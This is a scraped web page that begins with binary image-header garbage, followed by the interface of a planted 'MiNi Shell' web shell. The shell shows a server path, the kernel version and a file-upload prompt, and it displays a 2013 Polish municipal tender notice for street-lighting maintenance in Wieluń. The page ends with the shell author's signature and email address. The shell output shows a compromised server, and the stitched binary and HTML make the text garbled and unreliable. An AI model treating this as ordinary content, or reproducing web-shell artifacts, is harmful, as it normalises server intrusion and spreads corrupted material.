JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131121/476640-N-2013.html

<p class="kh_header"><b>Wieluń: Konserwacja oświetlenia ulicznego i drogowego w Gminie Wieluń</b><br>
<b>Numer ogłoszenia: 476640 - 2013; data zamieszczenia: 21.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wieluń , Plac Kazimierza Wielkiego 1, 98-300 Wieluń, woj. łódzkie, tel. 43 8860249, faks 43 8860260.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wielun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Konserwacja oświetlenia ulicznego i drogowego w Gminie Wieluń.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres umowy obejmuje czynności konserwacyjno-eksploatacyjne na urządzeniach oświetleniowych w celu utrzymania ich w należytym stanie technicznym. Ilość opraw oświetleniowych objętych konserwacją wynosi 3 684 szt.
Do urządzeń oświetleniowych zalicza się: napowietrzne linie oświetleniowe, kablowe linie oświetleniowe, oprawy oświetleniowe: źródło światła, klosz, odbłyśnik, układ zapłonowy, bezpiecznik wraz z podstawą bezpiecznikową, słupy oświetleniowe, złącza pomiarowe wraz z aparaturą sterowniczą i odbiornikami radiowymi, centrum sterowania radiowego oświetlenia ulicznego, inne urządzenia nie wymienione a składające się na oświetlenie ulic i dróg, elementy oświetlenia świątecznego miasta (ulice, rynek, ratusz, biblioteka, choinka, fontanna), oświetlenie iluminacyjne zabytkowej części miasta. Do obowiązków Wykonawcy należeć będzie:
1) pełna odpowiedzialność za urządzenia oświetlenia ulicznego z chwilą przejęcia ich do konserwacji oraz wykonanie czynności konserwacyjnych urządzeń oświetlenia ulicznego i drogowego znajdującego się na terenie gminy Wieluń w celu utrzymania ich w należytym stanie technicznym. Wykonawca ponosić będzie całkowitą odpowiedzialność w zakresie prawidłowego wykonywania czynności konserwacyjnych, przestrzegania przepisów bhp, Instrukcji współpracy ruchowej, Instrukcji organizacji bezpiecznej pracy i innych przepisów określających zasady pracy na urządzeniach energetycznych;
2) czynności bieżącej konserwacji, które obejmują:
a) przeglądy tras obwodów oświetleniowych napowietrznych i kablowych, stanu widocznych części przewodów (głównie ich połączeń i osprzętu), stanu czystości źródeł światła, stanu ubytków źródeł światła, poziomu hałasu i drgań źródeł światła oraz urządzeń zabezpieczeń i sterowania,
b) przeglądy kontrolne stanu świecenia źródeł światła - nie rzadziej niż raz na dwa tygodnie dla głównych dróg w obrębie miejscowości i innych ważnych dróg oraz nie rzadziej niż raz w miesiącu dla pozostałych dróg i miejsc publicznych,
c) przeglądy tablic oświetleniowych i przekaźnikowo-sterowniczych obejmujący sprawdzenie stanu technicznego tablic, połączeń prądowych i działań urządzeń sterowania,
d) całodobowy dozór nad centrum sterowania radiowego,
e) naprawy usterek stwierdzonych w wyniku przeglądów oraz w wyniku zgłoszeń reklamacyjnych obejmujące:
- wymianę uszkodzonych źródeł światła (żarówek), elementów układu zasilania i sterowania dławików, kondensatorów, bezpieczników, drzwiczek wnęk latarni, naprawy opraw, wysięgników, uszkodzonych kabli i zerwanych przewodów oświetleniowych osprzętu kablowego i przewodowego tych obwodów (izolatory, mufy kablowe, odgromniki itp.), naprawy uszkodzonych słupów (dotyczy wyłącznie słupów oświetleniowych, naprawy osłon i zamknięcie rozdzielnic oświetleniowych niskiego napięcia),
- wymianę uszkodzonych elementów (łączniki, bezpieczniki, odbiorniki radiowe i anteny itp.) regulacje, naprawy urządzeń sterowania, naprawy osłon i zamknięć rozdzielnic oświetleniowych niskiego napięcia,
e) dbanie o właściwy stanu opraw oświetleniowych i ich elementów w celu wyeliminowania zjawiska olśnienia, zmniejszenia żywotności źródeł światła, nadmiernego zmniejszenia strumienia świetlnego oraz zapewnienia równomierności oświetlenia,
f) mycie kloszy raz w kwartale w zakresie i terminie uzgodnionym z Zamawiającym, usuwanie plakatów, reklam itp. w ciągu 24 godz.,
g) zabezpieczenia antykorozyjne poprzez malowanie opraw, wysięgników i latarń, w razie potrzeby uzupełnianie ubytków cokołów i fundamentów szaf oświetleniowych i słupów. Protokolarne przekazanie pomalowanych urządzeń Zamawiającemu powinno nastąpić najpóźniej 30 dni przed końcem okresu obowiązywania umowy,
h) nadzór i konserwacja sterowania radiowego oświetlenia ulic i dróg,
i) udostepnienie numeru telefonu do całodobowego dyżuru, 
3) odnotowanie czynności konserwacyjnych uszkodzeń bieżących oświetlenia miejsc publicznych i dróg znajdujących się na terenie gminy w rejestrze uszkodzeń i napraw;
4) wykonanie czynności konserwacyjnych zgodnie z instrukcją współpracy ruchowej zawartej pomiędzy PGE Dystrybucja Oddział Łódź - Teren, Rejon Energetyczny Wieluń, a Gminą Wieluń;
5) czynności bieżącej konserwacji obwodów lub punktów świetlnych zgłaszane Wykonawcy przez Zamawiającego bądź inne osoby zainteresowane, wykonywane będą w terminach:
a) likwidacja zagrożeń dla osób postronnych, wynikłych z losowych uszkodzeń urządzeń oświetleniowych (wypadek drogowy, wichura, akty wandalizmu, itp.) w czasie maksymalnie 2 godzin od chwili otrzymania zgłoszenia o takim zagrożeniu wraz ze zwrotnym potwierdzeniem ich usunięcia do Zamawiającego,
b) wymiana lub naprawa, uzupełnienie skradzionych elementów urządzeń oświetlenia ulicznego i drogowego w ciągu 24 godzin,
c) wymiana na koszt Wykonawcy słupa oświetleniowego, wyposażenia słupa, w przypadku ich zniszczenia wskutek czynników losowych (np. wypadek drogowy, wichura, akty wandalizmu, itp.).
Czas naprawy będzie się liczył od dnia lub godziny otrzymania zgłoszenia awarii. W przypadku nieusunięcia w terminie awarii urządzeń i osprzętu oświetleniowego przez Wykonawcę, Zamawiający zleci wykonanie usługi firmie zewnętrznej, a kosztami postępowania i wykonania usługi obciąży Wykonawcę,
6) ponadto do obowiązków Wykonawcy należeć będzie:
a) wycinanie gałęzi drzew w obrębie linii oświetleniowych, opraw oświetleniowych,
b) Wykonawca wykona dwukrotnie w trakcie obowiązywania umowy  inwentaryzację wszystkich opraw oświetleniowych i przekaże ją Zmawiającemu w termie 30.11.2015 r. i 31.10.2017 r. 
c) podłączenie, załączenie i wyłączenie urządzeń oświetleniowych związane z imprezami okolicznościowymi organizowanymi przez Urząd Miejski w Wieluniu,
d) konserwacja, montaż i demontaż oświetlenia świątecznego,
e) powiadamianie Zamawiającego na bieżąco w dni robocze o awariach i wykonanych usługach oraz o zastosowaniu tymczasowych połączeń sieci zasilającej. Zamawiający na bieżąco ustali, dla których robót konieczne jest przeprowadzenie odbioru technicznego,
f) przekazanie Zamawiającemu w dniu następnym po zakończeniu przedmiotu umowy kluczy do zamykanych części urządzeń oraz aktualnych kodów dostępu do tych urządzeń, które wymagają ich podania podczas regulacji, programowania, itp.,
g) zabezpieczenie i oznakowanie terenu, na którym prowadzone są prace konserwacyjne oraz utrzymanie porządku w czasie realizacji prac,
h) stosowanie w uzgodnieniu z Zamawiającym, tylko fabrycznie nowych urządzeń i materiałów, posiadających wymagane atesty i certyfikaty, o parametrach zbliżonych do wymienianych,
i) współpraca ze służbami Zamawiającego,
j) zapewnienie kadry i nadzoru z wymaganymi uprawnieniami oraz zapewnienie sprzętu spełniającego wymagania norm technicznych,
k) koordynowanie prac realizowanych przez Podwykonawców,
7) odpowiedzialność za stan techniczny i bezpieczne funkcjonowanie urządzeń oświetlenia ulicznego i ponoszenie wszelkich konsekwencji z tego tytułu oraz z tytułu zaciemnienia ulicy lub jej odcinka, do odpowiedzialności cywilnej wobec osób trzecich włącznie, za wyjątkiem sytuacji losowych wynikłych nie z winy Wykonawcy;
8) zapewnienie na własny koszt transportu odpadów do miejsc ich wykorzystania lub utylizacji, łącznie z kosztami utylizacji;
9) przestrzeganie przepisów prawnych wynikających z następujących ustaw:
a) ustawy z dnia 27.04.2001 r. Prawo ochrony środowiska (Dz. U. z 2013 r.  poz. 1232),
b) ustawy z dnia 14.12.2012 r. o odpadach (Dz. U. z 2013 r. poz. 21 z późniejszymi zmianami);
Powołane przepisy prawne Wykonawca zobowiązuje się stosować z uwzględnieniem ewentualnych zmian stanu prawnego w tym zakresie;
10) zgłoszenie przypadków wyeksploatowania wytrzymałościowego słupa, co może spowodować zagrożenia dla życia. Wymiana słupa nastąpi na koszt Zamawiającego;
11) zlecenie na koszt Wykonawcy montażu oświetlenia świątecznego na kopule ratusza specjalistycznej firmie alpinistycznej;
12) likwidacja usterek po otrzymaniu informacji o awarii z centrum sterowania radiowego w terminie niezwłocznym lecz nie dłużej niż 4 h od momentu otrzymania zawiadomienia;
13) uzyskanie zezwoleń na przejazd pojazdu nienormatywnego (podnośnik samojezdny) podczas dojazdu do słupa z oprawą oświetleniową przy drogach gminnych i powiatowych;
14) uzyskanie i uzgodnienie projektu organizacji ruchu na czas wymiany lamp oświetlenia drogowego przy drogach krajowych i wojewódzkich.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających stanowiących nie więcej niż 50 % wartości zamówienia podstawowego, ewentualne zamówienie uzupełniające zostanie udzielone w trybie przewidzianym w art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych, jeżeli zostaną spełnione przesłanki ustawowe</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.23.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium do dnia 29.11.2013 r. do godz. 13.00 w wysokości: 4 800,00 zł (słownie: cztery tysiące osiemset złotych 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień. Zamawiający dokona oceny spełniania tego warunku udziału w postępowaniu na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w celu potwierdzenia wiedzy i doświadczenia Wykonawcy winni udokumentować zrealizowanie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, przynajmniej jednej usługi o podobnym charakterze tj.: polegającej na konserwacji oświetlenia o wartości minimum 150 000,00 zł w ramach jednej umowy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda udokumentowania dysponowania odpowiednim potencjałem technicznym. Zamawiający dokona oceny spełniania tego warunku udziału w postępowaniu na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku Zamawiający uzna dysponowanie osobami posiadającymi:
a) uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych - minimum 1 osoba,
b) ważną grupę kwalifikacyjną do wykonywania prac konserwacyjno-remontowych urządzeń elektroenergetycznych do 1 kV - minimum 2 osoby</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie żąda udokumentowania sytuacji ekonomicznej i finansowej. Zamawiający dokona oceny spełniania tego warunku udziału w postępowaniu na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zgodnie z art. 144 ust. 1 ustawy Pzp przewiduje się możliwość dokonania niżej wymienionych zmian:
1) zmiana wynagrodzenia może nastąpić w przypadku ustawowej zmiany stawki podatku VAT;
2) wynagrodzenie może ulec zmniejszeniu w przypadku odstąpienia przez Zamawiającego od realizacji części przedmiotu umowy oraz w przypadku odstąpienia od umowy przez Strony. 
2. Nie jest dopuszczalna zmiana Wykonawcy za wyjątkiem sukcesji generalnej, w tym dziedziczenia prawa w spółkach handlowych, przekształcenia, sukcesji z mocy prawa.
3. Zmiana postanowień umowy może nastąpić za zgodą obu stron wyrażoną na piśmie, w formie aneksu do umowy, pod rygorem nieważności takiej zmiany. Zmiany nie mogą naruszać postanowień zawartych w art. 144 ust. 1 ustawy Pzp</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.um.wielun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Wieluniu, ul. Piłsudskiego 14, Biuro Zamówień Publicznych, pokój nr 9.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.11.2013 godzina 13:00, miejsce: Urząd Miejski w Wieluniu Wydział Organizacyjny (Plac Kazimierza Wlk.1 budynek ratusza) pokój nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 28.12.2013.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com